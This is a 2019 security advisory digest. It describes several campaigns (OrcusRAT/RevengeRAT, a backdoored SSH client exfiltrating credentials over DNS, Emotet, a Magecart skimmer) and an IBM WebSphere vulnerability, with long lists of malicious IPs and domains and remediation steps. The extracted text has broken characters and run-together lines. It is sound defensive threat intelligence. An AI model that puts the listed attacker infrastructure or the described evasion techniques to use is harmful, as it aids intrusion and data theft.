NETWORK INTELLIGENCE SECURITY ADVISORY

NETWORK INTELLIGENCE SECURITY ADVISORYThe major security news items of the month - major threats and security patch advisory. The advisory also includes IOCs and remedia�on steps.

DigestSeptember 2019, Edi�on 1.0

IN THIS EDITION:

Security Advisory Listing Severity

To know more about our services reach us at info@niiconsul�ng.com or visit www.niiconsul�ng.com

The two Remote Access Trojans (RAT) called OrcusRAT and RevengeRAT, found targeting Government, Financial Institutions, IT Service Providers and Consultancies, on global scale

Mirrorthief group behind the new Magecart malware attack found targeting Web Technology Service Providers of E-Commerce and Hospitality industries on global scale.

Security Patch Advisory

High

High

A campaign from Threat Actors found using backdoored SSH (Secure Shell) client to exfiltrate credentials via DNS tunneling, from the compromised machines to attacker's C&C Server

ALSO INSIDE

High

High

High

New variant of Emotet Banking Trojan comes with added capabilities to intercept email conversation and uses spoofed email header & content to evade Anti-Spam detection mechanism

Sensitive Information Disclosure Vulnerability (CVE-2019-4505) found in IBM WebSphere Application Server

The two Remote Access Trojans (RAT) called OrcusRAT and RevengeRAT, found targeting Government, Financial Institutions, IT Service Providers and Consultancies, on global scale

IMPACTThis poses a serious risk of unauthorized access, data breach, financial loss, and can impact the reputation of an organization

SECURITY ADVISORY

READ

Date: August 29, 2019

INTRODUCTION

Attackers had used multiple but unique Tactics, Techniques, andProcedures (TTP) in each of their malware campaigns, which includedthe use of persistence techniques in their fileless Remote Access Trojans(RAT), obfuscation techniques to hide their C2 communication & C2infrastructure information, and evasion techniques to prevent AutomatedMalware Analysis Platforms from examine the malicious code or evadedetection by Antivirus programs.The malware campaigns from attackers involved the use of well-craftedspear-phishing email pretending to be from various authorities such asthe Better Business Bureau (BBB), Australian Competition & ConsumerCommission (ACCC), Ministry of Business Innovation & Employment(MBIE) and other regional agencies.The well-crafted spear-phishing email contained either macro-enabledWord document which had JavaScript code hidden using white font withwhite background, or drive-by-download link hosted on an attackercontrolled server that hosts a ZIP archive containing the malicious PE32file (bearing double extensions such as "filename.pdf.exe") used to infectthe system.OrcusRAT and RevengeRAT uses APC Injection technique to inject itsmalicious code into the signed legitimate Windows process running withinthe memory, and malicious code of both Remote Access Trojans (RAT)is never stored on the disk.The malicious code of OrcusRAT and RevengeRAT is executed every 60seconds, as part of its malware call-back routine which allow attackers tolisten and take backdoor access onto the compromised system.The C2 infrastructure was observed leveraging Dynamic Domain NameSystem (DDNS) and OpenVPN in an attempt to obfuscate the attacker'sC2 infrastructure & Communication

Severity: High

AFFECTED PRODUCTS

• Microsoft Windows Workstation and Server products.

SWEED: Exposing years of Agent Tesla campaigns

The two Remote Access Trojans (RAT) called OrcusRAT and RevengeRAT, found targeting Government, Financial Institutions, IT Service Providers and Consultancies, on global scale

IPADDRESSES193.161.193.99205.144.171.185

SECURITY ADVISORY

Date: August 29, 2019

REMEDIATION

1. Ensure Anti-Phishing solution is procured and deployed correctly.2. Ensure EXTERNAL EMAIL banner is enabled and configured properly with appropriate warningmessage.3. Ensure access to public file sharing platforms such as Dropbox and Google Drive, is strictly restricted on corporate network. Incase of business requirement, then kindly make sure traffic related to Dropbox and Google Drive is filtered through Web Application Firewall (WAF).4. Kindly enable deep inspection for outbound FTP and HTTP traffic passing through Web ApplicationFirewall (WAF).5. Ensure to monitor for excessive LDAP queries within 5 minutes from particular system, via SIEMsolution.6. Ensure IBM AIX and Windows OS are up-to-date with latest security patches, and proper accesscontrols are in place.7. Ensure access controls are properly implemented and periodically evaluated for ATM Switch andSWIFT Network.8. Ensure to closely monitor for any intrusion or suspicious activity on ATM Switch and SWIFT Network.9. Ensure proper access controls are in place for NetBanking and Third-Party Payment Services.10. Ensure to closely monitor for any intrusion or suspicious activity on NetBanking and Third-PartyPayment services.11. Ensure proper network segmentation are in place between DMZ and Internal Network.12. Strictly use least privilege accounts throughout the enterprise wide network.13. Strictly restrict inbound communication on Ports 135, 139, 445, and 3389, from external networks(Internet).14. Kindly restrict access on Ports 135, 139, 445, and 3389, for servers in production and access shouldonly be granted when needed.15. Ensure proper access control and email filtering are in place to protect Email Exchange Servers andEmail Accounts.16. Ensure PowerShell feature is Disabled on non-administrative systems in production environment.17. Kindly Block mentioned IP/Domain on security devices.18. Kindly Block Hashes, that are not detected by your Antivirus Program or not known to your AntivirusVendor

Severity: High

DOMAINS

• skymast231-001-site1.htempur l.com• qstorm.chickenkiller.com• botinbox.tk• forcemc.tk• portmap.host• shloki.xyz• malikkhan-001-site1.htempurl. com• pay-pal-deutschland-3.com• stitours.acutekpanama.com• panalette.alexchild.net• dirpan.com• wordpress.dirpan.com• multiserviciosfruto.alexchild.ne t• trokcarveiculos.com.br• alexchild.net• agency.alexchild.net• cybercafe.alexchild.net• maximtours-001-site6.atempur l.com• r2asistemas.com.br

A campaign from Threat Actors found using backdoored SSH (Secure Shell) client to exfiltrate credentials via DNS tunneling, from the compromised machines to attacker's C&C Server

IPADDRESSES164.132.181.85194.99.23.199162.255.119.147162.255.119.26

SECURITY ADVISORY

Date: September 04, 2019

• marweve.xyz• startheavilyprogressivefile.icu• californiabetting.org• nhcccroquet.com• pretpersonnel.top• opendevelopedhighlyfile.icu• fastergreatreformfileclicks.icu• updateoriginaluberfile.icu• initiatecompletelycurrentfile.icu• b7cvyzfjvrxb.icu• maketypeaskappclicks.icu• fasttypedlappclicks.icu• uuwwhytvzbatons.review• dgtrbobdpinnock.review• app-mobilesecurity.com• qkafulxxstiflers.review• fuwkdshine.download• teks.tv• qjhumibypassing.review• bqskpbnwqaraks.review• luvluvluvfaneto.club• smartupdflash.win• closeramiqp.xyz• trfqyxenophya.download• aqwjxjxs.com• clickanimation.info• linkedinlocaldublin.com• bdb0b3atw4.icu• tredirectonowmain.date• duplnqniebats.download• vnchicago.com• responservlslpl.icu• toussaint.xyz• vipkontakter4you.xyz• runrenewedhighlyfile.icu• doujindesu.wtf• restoreextremelyswiftfile.icu• maxwin99.cc• openhighlyquickprogram.icu• vqtvyssith.xyz• xn--ea-7rs95c.com• setupadvancedmostfile.icu• khpiu7ljixn7.xyz• smalloriginaltype-theclicks.icu• runheavilystrongprogram.icu• streamspeedyheavilyprogram.icu• mixflashsport.review• b2llll1111.fun• loadgreatlyfreeprogram.icu• operatequickoverlyfile.icu• playubernewestproduct.icu• startoverlyrenewedfile.icu• performquickcompletelyfile.icu• watchpreciseheavilyprogram.icu• streammostdevelopedfile.icu• watchrenewedextremelyfile.icu• initiategreatlyoriginalprogram.icu• freakiestcqneo.xyz

Severity: High

DOMAINS

• weberdut.com• icdn-cloud.com• trucden.win• kitchendesign-liverpool.co.uk• upgradedldealappclicks.top• iuewrnkadwekk.xyz• appleid-setting.com• b6n.cc• c6c977c19fbf492b.xyz• wzomps.us• smallbestdowngradedataclicks. icu• startprecisemostproduct.icu• makefuturebestfileclicks.top• synchighlycurrentplayer.icu• 2384y8ghdfqw.com• syncdevelopedoverlyprogram.i cu• syncintenselylatestprogram.icu• 4plus.club• saxhjs6ui5.info• 5ucyhkbzd.info• toponlinebestdataclicks.icu• slapmoreflash.stream• invoice-345683761.website• setupcurrentheavilyfile.icu• jjflvmvj308.site• startquickoverlyfile.icu• setupcurrentintenselyprogram .icu• bettergreatfinishappclicks.top• initiaterecenthighlyprogram.ic u• initiatelatestmostproduct.icu• streamprecisehighlyfile.icu• initiatecurrentheavilyprogram.i cu• levelflashtop.stream• pickflashdel.download• raeval.com• altavistadelago.com• dirflashguardtop.win• syncoverlyswiftprogram.icu• performextremelyswiftfile.icu• installmostfreeproduct.icu• 1134oxford.com• imaps.id

• watchrefinedintenselyprogram.icu• boot-upspeedyoverlyprogram.icu• fixextremelyquickproduct.icu• ayfpdrsuth.xyz• leulusdtdt.xyz• syncheavilynewestprogram.icu• runuberprogressiveprogram.icu• watchquickmostproduct.icu• opendevelopedintenselyfile.icu• installoverlyrefinedfile.icu• checkmap.info• luxury-watches.top• loadintenselynewestfile.icu• nage.me• mixdlgreatdataclicks.icu• mixdealapplefileclicks.top• runheavilyoriginalproduct.icu• launchquickintenselyfile.icu• updateubercurrentfile.icu• syncrecentoverlyfile.icu• mixseparatedealappclicks.icu• betterlastdealappclicks.top• fixbestfreshfileclicks.icu• kamotta.com• viewpeace.com• chinanews.network• jfnusslubbering.review• qqqb99kkkapv.com• avdntcbd.com• qwgkyfunsurmised.review• getlatestupdatefortechandnews.trade• rnebzumino.review• combinationofusefulassetsnow.download• fdjwrqwhlaciniae.review• registernowandgetthelatest.bid• thegoodmainforcontentset.win• beatplaymusic.download• repelisonline.net• outloook.live• getdealfuturefileclicks.top• fastmaintaintypefileclicks.icu• hostgatorcoupon.co• 677676376manbsmcoeorot.live• xn--off365-r9a6y.com• thegoodonesystemforcontentsrclear.downl oad• mediafuturedeal-rawclicks.icu• cjyw2lo9c7h8.icu• 7ufd6rxew5.icu• brandnewstart2finisheextensionsrightnow. trade• analyticalobjectdeductionconvertor.win• joomm.xyz• tipsforhealth.xyz• pixelradio.xyz• stevejobless.xyz• robwilson.xyz• mobilefun.xyz

New variant of Emotet Banking Trojan comes with added capabilities to intercept email conversation and uses spoofed email header & content to evade Anti-Spam detection mechanism.

IMPACTThis pose a serious risk of unauthorized access, data breach, financial loss, and might impact reputation of an organization.

SECURITY ADVISORY

READ

Date: September 18, 2019

INTRODUCTION

New variant of Emotet Banking Trojan comes with added capabilitiesto intercept ongoing email conversation on compromised systemand send email to all contacts with malicious attachment by spoofingemail header & email content. This new feature allows Emotet Banking Trojan to evade Anti-Spam Email Security solution as well as IPS system by making the malicious email conversation look legitimate via spoofed email header & content. Malicious email sent by Emotet Banking Trojan, are send without prior knowledge of the victim, and it is sent on fixed time interval to exfiltrate sensitive data from the victim's system. Additionally, Internet Protocols used for Email services, are also used for malware callback and C2 communication between victim's system & attacker's C2 server. This pose a serious risk of unauthorized access, data breach, and financial loss to the organizations.

Severity: High

VULNERABLE

• All Microsoft Windows Workstation and Server are vulnerable.

Emotet is back after a summer break

New variant of Emotet Banking Trojan comes with added capabilities to intercept email conversation and uses spoofed email header & content to evade Anti-Spam detection mechanism.

IP ADDRESSES

186.4.172.5201.212.57.109104.131.11.150178.32.255.13393.78.205.196176.58.93.123104.131.58.132216.154.222.5289.188.124.145179.62.18.56143.0.245.169190.92.103.7159.65.241.220203.130.0.67151.80.142.33185.187.198.4181.230.126.152201.250.11.236182.76.6.2179.12.170.88104.236.185.25190.104.64.197187.155.233.46198.199.88.162181.36.42.20594.205.247.10128.199.78.227162.144.119.21685.105.215.241162.243.125.212190.195.129.227190.220.69.69217.113.27.158142.93.88.16190.117.206.153200.123.150.89104.131.208.17588.215.2.2986.98.25.30200.21.90.694.177.253.126190.13.146.4791.92.191.134139.59.242.7659.152.93.46185.129.92.21079.127.57.42181.81.143.10869.43.168.23270.45.30.28190.10.194.42190.200.64.180178.254.6.2778.109.34.17892.222.125.16198.199.106.229

SECURITY ADVISORY

Date: September 18, 2019

REMEDIATION

1.Ensure Microsoft Windows Workstations and Servers are up-to-date with latest security patches.2.Strictly use least privilege accounts throughout the enterprise wide network.3.Immediately apply Security Patches for Microsoft vulnerabilities CVE-2019-1214, CVE-2019-1215, CVE-2019-1291, CVE-2019-1290, CVE-2019-0788, CVE-2019-0787, CVE-2019-1285, CVE-2019-1272, CVE-2019-1269, & CVE-2019-1280 on Windows OS.4.Ensure Security Patches for Microsoft SMB vulnerabilities CVE-2019-0633, CVE-2019-0630, & CVE-2019-0786 are applied on Windows OS.5.Ensure to Disable SMB version 1 (SMBv1) on Windows OS.6.Strictly restrict inbound communication on Ports 135, 139, 445, and 3389, from external networks (Internet).7.Kindly restrict access on Ports 135, 139, 445, and 3389, for servers in production and access should only be granted when needed.8.Ensure Antivirus Signature Database is up-to-date and Antivirus scan is run on daily or weekly basis.9.Ensure web browsers are updated to latest release.10.Ensure proper access control and email filtering are in place to protect Email Exchange Servers and Email Accounts.11.Ensure PowerShell and Remote Desktop features are Disabled on nonadministrative systems in production environment.12. Ensure VBScript execution in Internet Explorer is Disable on connected Windows System.13.Ensure Macros are Disabled in Microsoft Office Product on connected Windows System.14.Ensure ActiveX Control is Disable in Office files.15.Ensure ActiveX Control is Disable in Internet Explorer.16.Kindly ensure Adobe Flash Player is updated to latest release.17.Ensure internet facing devices, applications and services are using strong & complex passwords.18. Kindly Block mentioned IP/Domain on security devices.

Severity: High

New variant of Emotet Banking Trojan comes with added capabilities to intercept email conversation and uses spoofed email header & content to evade Anti-Spam detection mechanism.

DOMAINSwardesign.commireiatorrent.commultiesfera.comilimler.netmangaml.comautorepuestosdml.compep-egypt.comdanangluxury.comgcesab.combondagetrip.comsunflagsteel.comhotelkrome.comfollowergods.comstartupforbusiness.comrefferalstaff.combroadpeakdefense.comthink1.comlecairtravels.combiyunhui.comnautcoins.comblockchainjoblist.comwomenempowermentpakistan.comatnimanvilla.comyeuquynhnhai.comdeepikarai.comcustomernoble.comtabxolabs.commutlukadinlarakademisi.comholyurbanhotel.comkeikomimura.comzhaoyouxiu.comcovergt.cominesmanila.comapartahotelfamilyhouse.comtechiwant.comlimkon.comdentalsearchsolutions.comsirijayareddypsychologist.comkeqiang.proalldc.pwplayasrivieramaya.comdywanypers.pllabersa.combehlenjoiner.commaceju.commaymaychihai.comjannahqu.orgszmoldparts.comnomadztruck.combrkhukuk.cominterpathlaboratories.comgpmandiri.comnjb-gmbh.comketabnema.comeasy-service.orgngomavibe.co.kejannatkhah.iralcaido.com

SECURITY ADVISORY

Date: September 18, 2019

REMEDIATION7dot.cnagipasesores.comgoleta105.commakanaliabadian.irekerisiltihaliyikama.comnsfund.mnshejipxw.comekonkarserai.com59055.cnxinlou.infolarissalinhares.com.brtoptarotist.nlrobotechcity.comfitchciapara.cominternetshoppy.comblog.medkad.comkomatireddy.nethippbeta.000webhostapp.comnavenpsicologosgetafe.esguimaraesconstrutorasjc.com.brsoo.sgeroscenter.co.ilstackspay.comreza-khosravi.comw3brasil.compronhubhd.comkarenshealthfoods.comovercreative.comantonresidential.comgawaher-services.comthepropertydealerz.comhighamnet.co.ukhpaudiobooksfree.comaldocontreras.comirismal.comirbf.comhanabishi.netdoski.bygivehopeahand.orgalohasoftware.netchuquanla.comparsafanco.comiib123.comtokobajuaisyah.comhaosanwang.com.twchinapacific.co.nzrebel.aevaner.com.sgsitusjudimurah.comi-conglomerates.comgreenedus.comparsroman.irrevival-remaps.co.uksunchipaint.com.vnkisharzoni.ir

Severity: High

dp4kb.magelangkota.go.idjoshgeneralremodeling.uscanvas.printageous.commohsinsaeedulhaq.comanysbergbiltong.co.zamaxtraderpro.comcornelbusiness.co.ukmobiextend.comsafarnavade.iriewa.skcomicxy.clubblnautoclub.roosim-heshbon.co.iltrulykomal.comdemocuk.tklamaggiora.itunlimit517.co.jprpaconsultores.clstayfitphysio.caphongchitt.comdyingtoachieve.comv7gfx.dehawk-lines.comalcam.chtys-yokohama.co.jpaivaelectric.comcgi.org.arintellmix.comiloveat.frxwai.comsuisuncitystorage.comrupertsherwood.comsampling-group.comschaye.netsestili.itsirinadas.comlevarudevich.rumfstol.ruurbaniak.waw.plwoellhaf-it.deizeres.mlmssewatrust.comdeleogun.comairnetinfotech.comadinehac.irmuaxuanmedia.combanglanews-24.comschwaemmlein.detoggwyler.chwinebiddingthailand.comnovaworld-novaland.vnsteller-architekt.eushirtprinter.detaskforce1.netnacindia.insdorf.com.br

Mirrorthief group behind the new Magecart malware attack found targeting Web Technology Service Providers of E-Commerce and Hospitality industries in United States, Canada and other countries.

IMPACTThis pose a serious risk of data breach, financial loss, and might impact reputation of an organization.

SECURITY ADVISORY

READ

Date: September 19, 2019

INTRODUCTION

Mirrorthief group behind the new Magecart (online skimmer for paymentcard data) malware attack found targeting Web Technology ServiceProviders of E-Commerce and Hospitality industries in United States,Canada and other countries on global scale. Attacker tactics involves the deployment of Magecart malware codestraight into the repository of JavaScript libraries associated with WebTechnology Service Providers, which is widely used on thousands ofvendor's websites and it is specifically linked onto the Payment/Checkoutpage of the website for accepting payment card data from vendor'scustomers. This tactic allow attacker to compromise third-party JavaScriptlibrary used to support online payment gateway of the websites, insteadof compromising thousands of websites individually for collectingpayment card data. This tactic is widely used and have become acommon trend among attackers who are focused on financial benefits, asit is more scalable and allow attacker to collect a large number of paymentcard data at one shot on global scale. Magecart malware attack have become a persistent stain for manybusinesses who are accepting online payment through their websites,specially E-Commerce websites. This malware attack is either hard todetect or has very low detection rate since September 04, 2018 to till thedate. This is continuously emerging threat to payment card data, and it isstrongly recommended to choose third-party JavaScript libraries wisely.We also strongly recommend our customers to stay align with zero-trustapproach, while assessing the risk associated with third-party JavaScriptlibraries or any other services supporting online paymentgateway/system.

Severity: High

VULNERABLE

• This malware attack affects all web applications running on WordPress, Drupal, Apache Tomcat or HTTP, Apache Struts, Oracle WebLogic, Microsoft IIS, IBM WebSphere Application Server, etc.

Magecart Skimming Attack Targets Mobile Users of Hotel Chain Booking Websites

Mirrorthief group behind the new Magecart malware attack found targeting Web Technology Service Providers of E-Commerce and Hospitality industries in United States, Canada and other countries.

IP ADDRESSES2.56.215.66

SECURITY ADVISORY

Date: September 19, 2019

REMEDIATION

1. Ensure web applications running on WordPress, Drupal, Apache Tomcator HTTP, Apache Struts, Oracle WebLogic, Microsoft IIS, IBM WebSphereApplication Server, etc., are up-to-date with latest security patches.2. Ensure file and directory permissions on web server, are properlyconfigured.3. Ensure Web Application Firewall (WAF) is configured to inspect HTTPPOST responses on the web application server.4. Ensure to timely review the source codes of local or remote (linked)JavaScript libraries used for web application.5. Ensure to follow Zero-Trust approach while assessing the risk associatedwith third-party JavaScript libraries and services.6. Subscription to intelligence-driven Cyber Risk Management andManaged Security Services, are strongly recommended.7. Kindly Block mentioned IP/Domain on security devices.8. Kindly Block Hashes, that are not detected by your Antivirus Program ornot known to your Antivirus Vendor.

Severity: High

DOMAINS

googletrackmanager.com

HASHES (SHA-256)

HASHES

ac58602d149305bd2331d555c15e6292bd5d09c34ade9e5eebb81e9ef1e7b312

D E T E C T E D B Y A N T I V I R U S

Symantec TrendMicro McAfee Quick Heal Microsoft

No No No NoYes

HASHES

ac58602d149305bd2331d555c15e6292bd5d09c34ade9e5eebb81e9ef1e7b312

D E T E C T E D B Y IPS, WAF, and MGW

Cylance Palo Alto Fortinet McAfee GW Sophos ML

NOT KNOWN No NoNOT

KNOWNNOT KNOWN

Sensitive Information Disclosure Vulnerability (CVE-2019-4505)found in IBM WebSphere Application Server

IMPACTOn successful exploitation of thisvulnerability can allow remote attackers to construct a specifically crafted URL to obtain sensitive information from theserver and view any file in a certain directory of the server.

SECURITY ADVISORY

READ

Date: September 21, 2019

INTRODUCTION

Severity: High

REMEDIATION

1. Kindly upgrade IBM WebSphere Application Server (Traditional and Hypervisor Editions) version from 9.0.0.0 through 9.0.5.0, to latest version 9.0.5.1 or apply interim fix PH14796. 2. Kindly upgrade IBM WebSphere Application Server (Traditional and Hypervisor Editions) version from 8.5.0.0 through 8.5.5.16, to latest version 8.5.5.17 or apply interim fix PH14796. 3. Kindly apply interim fix PH14796 on IBM WebSphere Virtual Enterprise v7

Sensitive Information Disclosure Vulnerability (CVE-2019-4505) found inIBM WebSphere Application Server version 9.0, 8.5, 8.0, and 7.0.On Successful exploitation of this Vulnerability (CVE-2019-4505) in IBMWebSphere Application Server (Network Deployment) can allow remoteattackers to construct a specifically crafted URL to obtain sensitiveinformation from the server. This can also allow remote attackers to viewany file in a certain directory of the IBM WebSphere Application Server(Network Deployment).This vulnerability poses a serious risk of unauthorized disclosure ofsensitive information, which can be used to well-plan a targeted attackagainst the web services hosted on vulnerable IBM WebSphereApplication Server (Network Deployment).We strongly recommend our customers to upgrade their IBM WebSphereApplication Server (Traditional and Hypervisor Editions) version from9.0.0.0 through 9.0.5.0, to latest version 9.0.5.1 or apply interim fixPH14796, as well as IBM WebSphere Application Server (Traditional andHypervisor Editions) version from 8.5.0.0 through 8.5.5.16, to latestversion 8.5.5.17 or apply interim fix PH14796.We also like to bring into your notice that IBM WebSphere VirtualEnterprise v7 and v8 are no longer supported, it is recommended toupgrade to a fixed supported version of the product.For IBM WebSphere Virtual Enterprise v7, please apply interim fixPH14796. And for IBM WebSphere Virtual Enterprise v8, please contactIBM Customer Support for further assistance

AFFECTED PRODUCTS

WebSphere Application Server Version 9.0• WebSphere Application Server Version 8.5• WebSphere Virtual Enterprise Version 8.0• WebSphere Virtual Enterprise Version 7.0

• Information disclosure in WebSphere Application Server ND (CVE-2019-4505)

Security Patch Advisory09th September 2019 – 15th September 2019 | TRAC-ID: NII19.09.0.3

UBUNTU

Security Patch Advisory

REDHAT

NETAPP